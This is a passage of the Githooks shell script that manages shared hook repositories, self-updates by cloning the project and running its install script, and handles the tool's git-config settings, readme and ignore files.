SHARED_REPO_IS_LOCAL="true"
fi
if [ "$SHARED_REPO_IS_CLONED" = "true" ]; then
# Here we now have a supported Git URL or
# a local bare-repo `<localpath>`
# Split "...@(.*)"
if [ "$DO_SPLIT" = "true" ] && echo "$1" | grep -q "@"; then
SHARED_REPO_CLONE_URL="$(echo "$1" | sed -E "s|^(.+)@.+$|\\1|")"
SHARED_REPO_CLONE_BRANCH="$(echo "$1" | sed -E "s|^.+@(.+)$|\\1|")"
else
SHARED_REPO_CLONE_URL="$1"
SHARED_REPO_CLONE_BRANCH=""
fi
# Double-check what we did above
if echo "$SHARED_REPO_CLONE_BRANCH" | grep -q ":"; then
# the branch name had a ":" so it was probably not a branch name
SHARED_REPO_CLONE_URL="${SHARED_REPO_CLONE_URL}@${SHARED_REPO_CLONE_BRANCH}"
SHARED_REPO_CLONE_BRANCH=""
elif echo "$SHARED_REPO_CLONE_URL" | grep -qE ".*://[^/]+$"; then
# the clone URL is something starting with a protocol then no path parts, then we probably split at the wrong place
SHARED_REPO_CLONE_URL="${SHARED_REPO_CLONE_URL}@${SHARED_REPO_CLONE_BRANCH}"
SHARED_REPO_CLONE_BRANCH=""
fi
# Define the shared clone folder
SHA_HASH=$(echo "$1" | git hash-object --stdin 2>/dev/null)
NAME=$(echo "$1" | tail -c 48 | sed -E "s/[^a-zA-Z0-9]/-/g")
SHARED_ROOT="$INSTALL_DIR/shared/$SHA_HASH-$NAME"
fi
}
#####################################################
# Updates the shared hooks repositories
# on the list passed in on the first argument.
#####################################################
update_shared_hooks_in() {
SHARED_HOOKS_TYPE="$1"
SHARED_REPOS_LIST="$2"
IFS="$IFS_NEWLINE"
for SHARED_REPO in $SHARED_REPOS_LIST; do
unset IFS
set_shared_root "$SHARED_REPO"
if [ "$SHARED_REPO_IS_CLONED" != "true" ]; then
# Non-cloned roots are ignored
continue
elif [ "$SHARED_HOOKS_TYPE" = "--shared" ] &&
[ "$SHARED_REPO_IS_LOCAL" = "true" ]; then
echo "! Warning: Shared hooks in \`.githooks/.shared\` contain a local path" >&2
echo " \`$SHARED_REPO\`" >&2
echo " which is forbidden. It will be skipped." >&2
echo ""
echo " You can only have local paths for shared hooks defined" >&2
echo " in the local or global Git configuration." >&2
echo ""
echo " This can be achieved by running" >&2
echo " \$ git hooks shared add [--local|--global] \"$SHARED_REPO\"" >&2
echo " and deleting it from the \`.shared\` file by" >&2
echo " \$ git hooks shared remove --shared \"$SHARED_REPO\"" >&2
continue
fi
if [ -d "$SHARED_ROOT/.git" ]; then
echo "* Updating shared hooks from: $SHARED_REPO"
# shellcheck disable=SC2086
PULL_OUTPUT="$(execute_git "$SHARED_ROOT" pull 2>&1)"
# shellcheck disable=SC2181
if [ $? -ne 0 ]; then
echo "! Update failed, git pull output:" >&2
echo "$PULL_OUTPUT" >&2
fi
else
echo "* Retrieving shared hooks from: $SHARED_REPO_CLONE_URL"
ADD_ARGS=""
[ "$SHARED_REPO_IS_LOCAL" != "true" ] && ADD_ARGS="--depth=1"
[ -d "$SHARED_ROOT" ] &&
rm -rf "$SHARED_ROOT" &&
mkdir -p "$SHARED_ROOT"
if [ -n "$SHARED_REPO_CLONE_BRANCH" ]; then
# shellcheck disable=SC2086
CLONE_OUTPUT=$(git clone \
-c core.hooksPath=/dev/null \
--template=/dev/null \
--single-branch \
--branch "$SHARED_REPO_CLONE_BRANCH" \
$ADD_ARGS \
"$SHARED_REPO_CLONE_URL" \
"$SHARED_ROOT" 2>&1)
else
# shellcheck disable=SC2086
CLONE_OUTPUT=$(git clone \
-c core.hooksPath=/dev/null \
--template=/dev/null \
--single-branch \
$ADD_ARGS \
"$SHARED_REPO_CLONE_URL" \
"$SHARED_ROOT" 2>&1)
fi
# shellcheck disable=SC2181
if [ $? -ne 0 ]; then
echo "! Clone failed, git clone output:" >&2
echo "$CLONE_OUTPUT" >&2
fi
fi
IFS="$IFS_NEWLINE"
done
unset IFS
}
#####################################################
# Executes an ondemand installation
# of the latest Githooks version.
#
# Returns:
# 1 if the installation fails,
# 0 otherwise
#####################################################
run_ondemand_installation() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks install [--global]
Installs the Githooks hooks into the current repository.
If the \`--global\` flag is given, it executes the installation
globally, including the hook templates for future repositories.
"
return
fi
INSTALL_FLAGS="--single"
if [ "$1" = "--global" ]; then
INSTALL_FLAGS=""
elif [ -n "$1" ]; then
echo "! Invalid argument: \`$1\`" >&2 && exit 1
fi
if ! fetch_latest_updates; then
echo "! Failed to fetch the latest install script" >&2
echo " You can retry manually using one of the alternative methods," >&2
echo " see them here: https://github.com/rycus86/githooks#installation" >&2
exit 1
fi
# shellcheck disable=SC2086
if ! execute_install_script $INSTALL_FLAGS; then
echo "! Failed to execute the installation" >&2
exit 1
fi
}
#####################################################
# Executes an ondemand uninstallation of Githooks.
#
# Returns:
# 1 if the uninstallation fails,
# 0 otherwise
#####################################################
run_ondemand_uninstallation() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks uninstall [--global]
Uninstalls the Githooks hooks from the current repository.
If the \`--global\` flag is given, it executes the uninstallation
globally, including the hook templates and all local repositories.
"
return
fi
UNINSTALL_ARGS="--single"
if [ "$1" = "--global" ]; then
UNINSTALL_ARGS="--global"
elif [ -n "$1" ]; then
echo "! Invalid argument: \`$1\`" >&2 && exit 1
fi
if ! execute_uninstall_script $UNINSTALL_ARGS; then
echo "! Failed to execute the uninstallation" >&2
exit 1
fi
}
#####################################################
# Executes an update check, and potentially
# the installation of the latest version.
#
# Returns:
# 1 if the latest version cannot be retrieved,
# 0 otherwise
#####################################################
run_update_check() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks update [force]
git hooks update [enable|disable]
Executes an update check for a newer Githooks version.
If it finds one, or if \`force\` was given, the downloaded
install script is executed for the latest version.
The \`enable\` and \`disable\` options enable or disable
the automatic checks that would normally run daily
after a successful commit event.
"
return 0
fi
if [ "$1" = "enable" ]; then
git config --global githooks.autoupdate.enabled true &&
echo "Automatic update checks have been enabled" &&
return 0
echo "! Failed to enable automatic updates" >&2 && exit 1
elif [ "$1" = "disable" ]; then
git config --global githooks.autoupdate.enabled false &&
echo "Automatic update checks have been disabled" &&
return 0
echo "! Failed to disable automatic updates" >&2 && exit 1
elif [ -n "$1" ] && [ "$1" != "force" ]; then
echo "! Invalid operation: \`$1\`" >&2 && exit 1
fi
record_update_time
if ! fetch_latest_updates; then
echo "! Failed to check for updates: cannot fetch updates"
exit 1
fi
if [ "$1" != "force" ]; then
if ! is_update_available; then
echo " Githooks is already on the latest version"
return 0
fi
fi
# shellcheck disable=SC2086
if ! execute_install_script $INSTALL_FLAGS; then
echo "! Failed to execute the installation"
print_update_disable_info
return 1
fi
return 0
}
#####################################################
# Saves the last update time into the
# githooks.autoupdate.lastrun global Git config.
#
# Returns:
# None
#####################################################
record_update_time() {
git config --global githooks.autoupdate.lastrun "$(date +%s)"
}
#####################################################
# Returns the script path e.g. `run` for the app
# `$1`
#
# Returns:
# 0 and "$INSTALL_DIR/tools/$1/run"
# 1 and "" otherwise
#####################################################
get_tool_script() {
if [ -f "$INSTALL_DIR/tools/$1/run" ]; then
echo "$INSTALL_DIR/tools/$1/run" && return 0
fi
return 1
}
#####################################################
# Call a script "$1". If it is not executable
# call it as a shell script.
#
# Returns:
# Error code of the script.
#####################################################
call_script() {
SCRIPT="$1"
shift
if [ -x "$SCRIPT" ]; then
"$SCRIPT" "$@"
else
sh "$SCRIPT" "$@"
fi
return $?
}
#####################################################
# Does a update clone repository exist in the
# install folder
#
# Returns: 0 if `true`, 1 otherwise
#####################################################
is_release_clone_existing() {
if git -C "$INSTALL_DIR/release" rev-parse >/dev/null 2>&1; then
return 0
fi
return 1
}
#####################################################
# Checks if there is an update in the release clone
# waiting for a fast-forward merge.
#
# Returns:
# 0 if an update needs to be applied, 1 otherwise
#####################################################
is_update_available() {
[ "$GITHOOKS_CLONE_UPDATE_AVAILABLE" = "true" ] || return 1
}
#####################################################
# Fetches updates in the release clone.
# If the release clone is newly created the variable
# `$GITHOOKS_CLONE_CREATED` is set to
# `true`
# If an update is available
# `GITHOOKS_CLONE_UPDATE_AVAILABLE` is set to `true`
#
# Returns:
# 1 if failed, 0 otherwise
#####################################################
fetch_latest_updates() {
echo "^ Checking for updates ..."
GITHOOKS_CLONE_CREATED="false"
GITHOOKS_CLONE_UPDATE_AVAILABLE="false"
GITHOOKS_CLONE_URL=$(git config --global githooks.cloneUrl)
GITHOOKS_CLONE_BRANCH=$(git config --global githooks.cloneBranch)
# We do a fresh clone if there is not a repository
# or wrong url/branch configured and the user agrees.
if is_git_repo "$GITHOOKS_CLONE_DIR"; then
URL=$(execute_git "$GITHOOKS_CLONE_DIR" config remote.origin.url 2>/dev/null)
BRANCH=$(execute_git "$GITHOOKS_CLONE_DIR" symbolic-ref -q --short HEAD 2>/dev/null)
if [ "$URL" != "$GITHOOKS_CLONE_URL" ] ||
[ "$BRANCH" != "$GITHOOKS_CLONE_BRANCH" ]; then
CREATE_NEW_CLONE="false"
echo "! Cannot fetch updates because \`origin\` of update clone" >&2
echo " \`$GITHOOKS_CLONE_DIR\`" >&2
echo " points to url:" >&2
echo " \`$URL\`" >&2
echo " on branch \`$BRANCH\`" >&2
echo " which is not configured." >&2
echo "Do you want to delete and reclone the existing update clone? [N/y]"
read -r ANSWER </dev/tty
if [ "$ANSWER" = "y" ] || [ "$ANSWER" = "Y" ]; then
CREATE_NEW_CLONE="true"
fi
if [ "$CREATE_NEW_CLONE" != "true" ]; then
echo "! See \`git hooks config [set|print] clone-url\` and" >&2
echo " \`git hooks config [set|print] clone-branch\`" >&2
echo " Either fix this or delete the clone" >&2
echo " \`$GITHOOKS_CLONE_DIR\`" >&2
echo " to trigger a new checkout." >&2
return 1
fi
fi
# Check if the update clone is dirty which it really should not.
if ! execute_git "$GITHOOKS_CLONE_DIR" diff-index --quiet HEAD >/dev/null 2>&1; then
echo "! Cannot pull updates because the update clone" >&2
echo " \`$GITHOOKS_CLONE_DIR\`" >&2
echo " is dirty!" >&2
echo "Do you want to delete and reclone the existing update clone? [N/y]"
read -r ANSWER </dev/tty
if [ "$ANSWER" = "y" ] || [ "$ANSWER" = "Y" ]; then
CREATE_NEW_CLONE="true"
fi
if [ "$CREATE_NEW_CLONE" != "true" ]; then
echo "! Either fix this or delete the clone" >&2
echo " \`$GITHOOKS_CLONE_DIR\`" >&2
echo " to trigger a new checkout." >&2
return 1
fi
fi
else
CREATE_NEW_CLONE="true"
fi
if [ "$CREATE_NEW_CLONE" = "true" ]; then
clone_release_repository || return 1
# shellcheck disable=SC2034
GITHOOKS_CLONE_CREATED="true"
GITHOOKS_CLONE_UPDATE_AVAILABLE="true"
else
FETCH_OUTPUT=$(
execute_git "$GITHOOKS_CLONE_DIR" fetch origin "$GITHOOKS_CLONE_BRANCH" 2>&1
)
# shellcheck disable=SC2181
if [ $? -ne 0 ]; then
echo "! Fetching updates in \`$GITHOOKS_CLONE_DIR\` failed with:" >&2
echo "$FETCH_OUTPUT" >&2
return 1
fi
RELEASE_COMMIT=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse "$GITHOOKS_CLONE_BRANCH")
UPDATE_COMMIT=$(execute_git "$GITHOOKS_CLONE_DIR" rev-parse "origin/$GITHOOKS_CLONE_BRANCH")
if [ "$RELEASE_COMMIT" != "$UPDATE_COMMIT" ]; then
# We have an update available
# install.sh deals with updating ...
GITHOOKS_CLONE_UPDATE_AVAILABLE="true"
fi
fi
return 0
}
############################################################
# Checks whether the given directory
# is a Git repository (bare included) or not.
#
# Returns:
# 1 if failed, 0 otherwise
############################################################
is_git_repo() {
git -C "$1" rev-parse >/dev/null 2>&1 || return 1
}
############################################################
# Checks whether the given directory
# is a Git bare repository.
#
# Returns:
# 1 if failed, 0 otherwise
############################################################
is_bare_repo() {
[ "$(git -C "$1" rev-parse --is-bare-repository 2>/dev/null)" = "true" ] || return 1
}
#####################################################
# Safely execute a git command in the standard
# clone dir `$1`.
#
# Returns: Error code from `git`
#####################################################
execute_git() {
REPO="$1"
shift
git -C "$REPO" \
--work-tree="$REPO" \
--git-dir="$REPO/.git" \
-c core.hooksPath=/dev/null \
"$@"
}
#####################################################
# Creates the release clone if needed.
# Returns:
# 1 if failed, 0 otherwise
#####################################################
assert_release_clone() {
# We do a fresh clone if there is no clone
if ! is_git_repo "$GITHOOKS_CLONE_DIR"; then
clone_release_repository || return 1
fi
return 0
}
############################################################
# Clone the URL `$GITHOOKS_CLONE_URL` into the install
# folder `$INSTALL_DIR/release` for further updates.
#
# Returns: 0 if succesful, 1 otherwise
############################################################
clone_release_repository() {
GITHOOKS_CLONE_URL=$(git config --global githooks.cloneUrl)
GITHOOKS_CLONE_BRANCH=$(git config --global githooks.cloneBranch)
if [ -z "$GITHOOKS_CLONE_URL" ]; then
GITHOOKS_CLONE_URL="https://github.com/rycus86/githooks.git"
fi
if [ -z "$GITHOOKS_CLONE_BRANCH" ]; then
GITHOOKS_CLONE_BRANCH="master"
fi
if [ -d "$GITHOOKS_CLONE_DIR" ]; then
if ! rm -rf "$GITHOOKS_CLONE_DIR" >/dev/null 2>&1; then
echo "! Failed to remove an existing githooks release repository" >&2
return 1
fi
fi
echo "Cloning \`$GITHOOKS_CLONE_URL\` to \`$GITHOOKS_CLONE_DIR\` ..."
CLONE_OUTPUT=$(git clone \
-c core.hooksPath=/dev/null \
--template=/dev/null \
--depth=1 \
--single-branch \
--branch "$GITHOOKS_CLONE_BRANCH" \
"$GITHOOKS_CLONE_URL" "$GITHOOKS_CLONE_DIR" 2>&1)
# shellcheck disable=SC2181
if [ $? -ne 0 ]; then
echo "! Cloning \`$GITHOOKS_CLONE_URL\` to \`$GITHOOKS_CLONE_DIR\` failed with output: " >&2
echo "$CLONE_OUTPUT" >&2
return 1
fi
git config --global githooks.cloneUrl "$GITHOOKS_CLONE_URL"
git config --global githooks.cloneBranch "$GITHOOKS_CLONE_BRANCH"
return 0
}
#####################################################
# Checks if updates are enabled.
#
# Returns:
# 0 if updates are enabled, 1 otherwise
#####################################################
is_autoupdate_enabled() {
[ "$(git config --global githooks.autoupdate.enabled)" = "Y" ] || return 1
}
#####################################################
# Performs the installation of the previously
# fetched install script.
#
# Returns:
# 0 if the installation was successful, 1 otherwise
#####################################################
execute_install_script() {
if ! assert_release_clone; then
echo "! Could not create a release clone in \`$GITHOOKS_CLONE_DIR\`" >&2
exit 1
fi
# Set the install script
INSTALL_SCRIPT="$INSTALL_DIR/release/install.sh"
if [ ! -f "$INSTALL_SCRIPT" ]; then
echo "! Non-existing \`install.sh\` in \`$INSTALL_DIR/release\`" >&2
return 1
fi
sh -s -- "$@" <"$INSTALL_SCRIPT" || return 1
return 0
}
#####################################################
# Performs the uninstallation of the previously
# fetched uninstall script.
#
# Returns:
# 0 if the uninstallation was successful,
# 1 otherwise
#####################################################
execute_uninstall_script() {
# Set the install script
UNINSTALL_SCRIPT="$INSTALL_DIR/release/uninstall.sh"
if [ ! -f "$UNINSTALL_SCRIPT" ]; then
echo "! Non-existing \`uninstall.sh\` in \`$INSTALL_DIR/release\`" >&2
return 1
fi
sh -s -- "$@" <"$UNINSTALL_SCRIPT" || return 1
return 0
}
#####################################################
# Prints some information on how to disable
# automatic update checks.
#
# Returns:
# None
#####################################################
print_update_disable_info() {
echo " If you would like to disable auto-updates, run:"
echo " \$ git hooks update disable"
}
#####################################################
# Adds or updates the Githooks README in
# the current local repository.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
manage_readme_file() {
case "$1" in
"add")
FORCE_README=""
;;
"update")
FORCE_README="y"
;;
*)
print_help_header
echo "
git hooks readme [add|update]
Adds or updates the Githooks README in the \`.githooks\` folder.
If \`add\` is used, it checks first if there is a README file already.
With \`update\`, the file is always updated, creating it if necessary.
This command needs to be run at the root of a repository.
"
if [ "$1" = "help" ]; then
exit 0
else
exit 1
fi
;;
esac
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if [ -f .githooks/README.md ] && [ "$FORCE_README" != "y" ]; then
echo "! This repository already seems to have a Githooks README." >&2
echo " If you would like to replace it with the latest one, please run \`git hooks readme update\`" >&2
exit 1
fi
if ! assert_release_clone; then
exit 1
fi
README_FILE="$INSTALL_DIR/release/.githooks/README.md"
mkdir -p "$(pwd)/.githooks" &&
cat "$README_FILE" >"$(pwd)/.githooks/README.md" &&
echo "The README file is updated." &&
echo_if_non_bare_repo " Do not forget to commit and push it!" ||
echo "! Failed to update the README file in the current repository" >&2
}
#####################################################
# Adds or updates Githooks ignore files in
# the current local repository.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
manage_ignore_files() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks ignore [pattern...]
git hooks ignore [trigger] [pattern...]
Adds new file name patterns to the Githooks \`.ignore\` file, either
in the main \`.githooks\` folder, or in the Git event specific one.
Note, that it may be required to surround the individual pattern
parameters with single quotes to avoid expanding or splitting them.
The \`trigger\` parameter should be the name of the Git event if given.
This command needs to be run at the root of a repository.
"
return
fi
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
TRIGGER_TYPES="
applypatch-msg pre-applypatch post-applypatch
pre-commit prepare-commit-msg commit-msg post-commit
pre-rebase post-checkout post-merge pre-push
pre-receive update post-receive post-update
push-to-checkout pre-auto-gc post-rewrite sendemail-validate"
TARGET_DIR="$(pwd)/.githooks"
for TRIGGER_TYPE in $TRIGGER_TYPES; do
if [ "$1" = "$TRIGGER_TYPE" ]; then
TARGET_DIR="$(pwd)/.githooks/$TRIGGER_TYPE"
shift
break
fi
done
if [ -z "$1" ]; then
manage_ignore_files "help"
echo "! Missing pattern parameter" >&2
exit 1
fi
if ! mkdir -p "$TARGET_DIR" && touch "$TARGET_DIR/.ignore"; then
echo "! Failed to prepare the ignore file at $TARGET_DIR/.ignore" >&2
exit 1
fi
[ -f "$TARGET_DIR/.ignore" ] &&
echo "" >>"$TARGET_DIR/.ignore"
for PATTERN in "$@"; do
if ! echo "$PATTERN" >>"$TARGET_DIR/.ignore"; then
echo "! Failed to update the ignore file at $TARGET_DIR/.ignore" >&2
exit 1
fi
done
echo "The ignore file at $TARGET_DIR/.ignore is updated"
echo_if_non_bare_repo " Do not forget to commit the changes!"
}
#####################################################
# Manages various Githooks settings,
# that is stored in Git configuration.
#
# Returns:
# 1 on failure, 0 otherwise
#####################################################
manage_configuration() {
if [ "$1" = "help" ]; then
print_help_header
echo "
git hooks config list [--local|--global]
Lists the Githooks related settings of the Githooks configuration.
Can be either global or local configuration, or both by default.
git hooks config [set|reset|print] disable
Disables running any Githooks files in the current repository,
when the \`set\` option is used.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
This command needs to be run at the root of a repository.
[deprecated] git hooks config [set|reset|print] single
This command is deprecated and will be removed in the future.
Marks the current local repository to be managed as a single Githooks
installation, or clears the marker, with \`set\` and \`reset\` respectively.
The \`print\` option outputs the current setting of it.
This command needs to be run at the root of a repository.
git hooks config set search-dir <path>
git hooks config [reset|print] search-dir
Changes the previous search directory setting used during installation.
The \`set\` option changes the value, and the \`reset\` option clears it.
The \`print\` option outputs the current setting of it.
git hooks config set shared [--local] <git-url...>
git hooks config [reset|print] shared [--local]
Updates the list of global (or local) shared hook repositories when
the \`set\` option is used, which accepts multiple <git-url> arguments,
each containing a clone URL of a hook repository.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
git hooks config [accept|deny|reset|print] trusted
Accepts changes to all existing and new hooks in the current repository
when the trust marker is present and the \`set\` option is used.
The \`deny\` option marks the repository as
it has refused to trust the changes, even if the trust marker is present.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
This command needs to be run at the root of a repository.
git hooks config [enable|disable|reset|print] update
Enables or disables automatic update checks with
the \`enable\` and \`disable\` options respectively.
The \`reset\` option clears this setting.
The \`print\` option outputs the current setting.
git hooks config set clone-url <git-url>
git hooks config [set|print] clone-url
Sets or prints the configured githooks clone url used
for any update.
git hooks config set clone-branch <branch-name>
git hooks config print clone-branch
Sets or prints the configured branch of the update clone
used for any update.
git hooks config [reset|print] update-time
Resets the last Githooks update time with the \`reset\` option,
causing the update check to run next time if it is enabled.
Use \`git hooks update [enable|disable]\` to change that setting.
The \`print\` option outputs the current value of it.
git hooks config [enable|disable|print] fail-on-non-existing-shared-hooks [--local|--global]
Enable or disable failing hooks with an error when any
shared hooks configured in \`.shared\` are missing,
which usually means \`git hooks update\` has not been called yet.
git hooks config [yes|no|reset|print] delete-detected-lfs-hooks
By default, detected LFS hooks during install are disabled and backed up.
The \`yes\` option remembers to always delete these hooks.
The \`no\` option remembers the default behavior.
The decision is reset with \`reset\` to the default behavior.
The \`print\` option outputs the current behavior.
"
return
fi
CONFIG_OPERATION="$1"
if [ "$CONFIG_OPERATION" = "list" ]; then
if [ "$2" = "--local" ] && ! is_running_in_git_repo_root; then
echo "! Local configuration can only be printed from a Git repository" >&2
exit 1
fi
if [ -z "$2" ]; then
git config --get-regexp "(^githooks|alias.hooks)" | sort
else
git config "$2" --get-regexp "(^githooks|alias.hooks)" | sort
fi
exit $?
fi
CONFIG_ARGUMENT="$2"
[ "$#" -ge 1 ] && shift
[ "$#" -ge 1 ] && shift
case "$CONFIG_ARGUMENT" in
"disable")
config_disable "$CONFIG_OPERATION"
;;
"search-dir")
config_search_dir "$CONFIG_OPERATION" "$@"
;;
"shared")
config_shared_hook_repos "$CONFIG_OPERATION" "$@"
;;
"trusted")
config_trust_all_hooks "$CONFIG_OPERATION"
;;
"update")
config_update_state "$CONFIG_OPERATION" "$@"
;;
"clone-url")
config_update_clone_url "$CONFIG_OPERATION" "$@"
;;
"clone-branch")
config_update_clone_branch "$CONFIG_OPERATION" "$@"
;;
"update-time")
config_update_last_run "$CONFIG_OPERATION"
;;
"fail-on-non-existing-shared-hooks")
config_fail_on_not_existing_shared_hooks "$CONFIG_OPERATION" "$@"
;;
"delete-detected-lfs-hooks")
config_delete_detected_lfs_hooks "$CONFIG_OPERATION" "$@"
;;
*)
manage_configuration "help"
echo "! Invalid configuration option: \`$CONFIG_ARGUMENT\`" >&2
exit 1
;;
esac
}
#####################################################
# Manages Githooks disable settings for
# the current repository.
# Prints or modifies the \`githooks.disable\`
# local Git configuration.
#####################################################
config_disable() {
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if [ "$1" = "set" ]; then
git config githooks.disable true
elif [ "$1" = "reset" ]; then
git config --unset githooks.disable
elif [ "$1" = "print" ]; then
if is_repository_disabled; then
echo "Githooks is disabled in the current repository"
else
echo "Githooks is NOT disabled in the current repository"
fi
else
echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages previous search directory setting
# used during Githooks installation.
# Prints or modifies the
# \`githooks.previousSearchDir\`
# global Git configuration.
#####################################################
config_search_dir() {
if [ "$1" = "set" ]; then
if [ -z "$2" ]; then
manage_configuration "help"
echo "! Missing <path> parameter" >&2
exit 1
fi
git config --global githooks.previousSearchDir "$2"
elif [ "$1" = "reset" ]; then
git config --global --unset githooks.previousSearchDir
elif [ "$1" = "print" ]; then
CONFIG_SEARCH_DIR=$(git config --global --get githooks.previousSearchDir)
if [ -z "$CONFIG_SEARCH_DIR" ]; then
echo "No previous search directory is set"
else
echo "Search directory is set to: $CONFIG_SEARCH_DIR"
fi
else
echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages global shared hook repository list setting.
# Prints or modifies the \`githooks.shared\`
# global Git configuration.
#####################################################
config_shared_hook_repos() {
if [ "$1" = "set" ]; then
SHARED_TYPE="--global"
[ "$2" = "--local" ] && SHARED_TYPE="$2" && shift
if [ -z "$2" ]; then
manage_configuration "help"
echo "! Missing <git-url> parameter" >&2
exit 1
fi
shift
for SHARED_REPO_ITEM in "$@"; do
git config "$SHARED_TYPE" --add githooks.shared "$SHARED_REPO_ITEM"
done
elif [ "$1" = "reset" ]; then
SHARED_TYPE="--global"
if echo "$2" | grep -qE "\-\-(local)"; then
SHARED_TYPE="$2"
elif [ -n "$2" ]; then
manage_configuration "help"
echo "! Wrong argument \`$2\`" >&2
fi
git config "$SHARED_TYPE" --unset-all githooks.shared
elif [ "$1" = "print" ]; then
SHARED_TYPE="--global"
if echo "$2" | grep -qE "\-\-(local)"; then
SHARED_TYPE="$2"
elif [ -n "$2" ]; then
manage_configuration "help"
echo "! Wrong argument $($2)" >&2
fi
list_shared_hook_repos "$SHARED_TYPE"
else
manage_configuration "help"
echo "! Invalid operation: \`$1\` (use \`set\`, \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the trust-all-hooks setting
# for the current repository.
# Prints or modifies the \`githooks.trust.all\`
# local Git configuration.
#####################################################
config_trust_all_hooks() {
if ! is_running_in_git_repo_root; then
echo "The current directory \`$(pwd)\` does not seem to be the root of a Git repository!"
exit 1
fi
if [ "$1" = "accept" ]; then
git config githooks.trust.all Y
elif [ "$1" = "deny" ]; then
git config githooks.trust.all N
elif [ "$1" = "reset" ]; then
git config --unset githooks.trust.all
elif [ "$1" = "print" ]; then
CONFIG_TRUST_ALL=$(git config --local --get githooks.trust.all)
if [ "$CONFIG_TRUST_ALL" = "Y" ]; then
echo "The current repository trusts all hooks automatically"
elif [ -z "$CONFIG_TRUST_ALL" ]; then
echo "The current repository does NOT have trust settings"
else
echo "The current repository does NOT trust hooks automatically"
fi
else
echo "! Invalid operation: \`$1\` (use \`accept\`, \`deny\`, \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the automatic update check setting.
# Prints or modifies the
# \`githooks.autoupdate.enabled\`
# global Git configuration.
#####################################################
config_update_state() {
if [ "$1" = "enable" ]; then
git config --global githooks.autoupdate.enabled true
elif [ "$1" = "disable" ]; then
git config --global githooks.autoupdate.enabled false
elif [ "$1" = "reset" ]; then
git config --global --unset githooks.autoupdate.enabled
elif [ "$1" = "print" ]; then
CONFIG_UPDATE_ENABLED=$(git config --get githooks.autoupdate.enabled)
if [ "$CONFIG_UPDATE_ENABLED" = "true" ] ||
[ "$CONFIG_UPDATE_ENABLED" = "Y" ]; then
echo "Automatic update checks are enabled"
else
echo "Automatic update checks are NOT enabled"
fi
else
echo "! Invalid operation: \`$1\` (use \`enable\`, \`disable\`, \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the automatic update clone url.
# Prints or modifies the
# \`githooks.cloneUrl\`
# global Git configuration.
#####################################################
config_update_clone_url() {
if [ "$1" = "print" ]; then
echo "Update clone url set to: $(git config --global githooks.cloneUrl)"
elif [ "$1" = "set" ]; then
if [ -z "$2" ]; then
echo "! No valid url given" >&2
exit 1
fi
git config --global githooks.cloneUrl "$2"
config_update_clone_url "print"
else
echo "! Invalid operation: \`$1\` (use \`set\`, or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the automatic update clone branch.
# Prints or modifies the
# \`githooks.cloneUrl\`
# global Git configuration.
#####################################################
config_update_clone_branch() {
if [ "$1" = "print" ]; then
echo "Update clone branch set to: $(git config --global githooks.cloneBranch)"
elif [ "$1" = "set" ]; then
if [ -z "$2" ]; then
echo "! No valid branch name given" >&2
exit 1
fi
git config --global githooks.cloneBranch "$2"
config_update_clone_branch "print"
else
echo "! Invalid operation: \`$1\` (use \`set\`, or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the timestamp for the last update check.
# Prints or modifies the
# \`githooks.autoupdate.lastrun\`
# global Git configuration.
#####################################################
config_update_last_run() {
if [ "$1" = "reset" ]; then
git config --global --unset githooks.autoupdate.lastrun
elif [ "$1" = "print" ]; then
LAST_UPDATE=$(git config --global --get githooks.autoupdate.lastrun)
if [ -z "$LAST_UPDATE" ]; then
echo "The update has never run"
else
if ! date --date="@${LAST_UPDATE}" 2>/dev/null; then
if ! date -j -f "%s" "$LAST_UPDATE" 2>/dev/null; then
echo "Last update timestamp: $LAST_UPDATE"
fi
fi
fi
else
echo "! Invalid operation: \`$1\` (use \`reset\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the failOnNonExistingSharedHook switch.
# Prints or modifies the
# `githooks.failOnNonExistingSharedHooks`
# local or global Git configuration.
#####################################################
config_fail_on_not_existing_shared_hooks() {
CONFIG="--local"
if [ -n "$2" ]; then
if [ "$2" = "--local" ] || [ "$2" = "--global" ]; then
CONFIG="$2"
else
echo "! Invalid option: \`$2\` (use \`--local\` or \`--global\`)" >&2
exit 1
fi
fi
if [ "$1" = "enable" ]; then
if ! git config "$CONFIG" githooks.failOnNonExistingSharedHooks "true"; then
echo "! Failed to enable \`fail-on-non-existing-shared-hooks\`" >&2
exit 1
fi
echo "Failing on not existing shared hooks is enabled"
elif [ "$1" = "disable" ]; then
if ! git config "$CONFIG" githooks.failOnNonExistingSharedHooks "false"; then
echo "! Failed to disable \`fail-on-non-existing-shared-hooks\`" >&2
exit 1
fi
echo "Failing on not existing shared hooks is disabled"
elif [ "$1" = "print" ]; then
FAIL_ON_NOT_EXISTING=$(git config "$CONFIG" --get githooks.failOnNonExistingSharedHooks)
if [ "$FAIL_ON_NOT_EXISTING" = "true" ]; then
echo "Failing on not existing shared hooks is enabled"
else
# default also if it does not exist
echo "Failing on not existing shared hooks is disabled"
fi
else
echo "! Invalid operation: \`$1\` (use \`enable\`, \`disable\` or \`print\`)" >&2
exit 1
fi
}
#####################################################
# Manages the deleteDetectedLFSHooks default bahavior.
# Modifies or prints
# `githooks.deleteDetectedLFSHooks`
# global Git configuration.
#####################################################
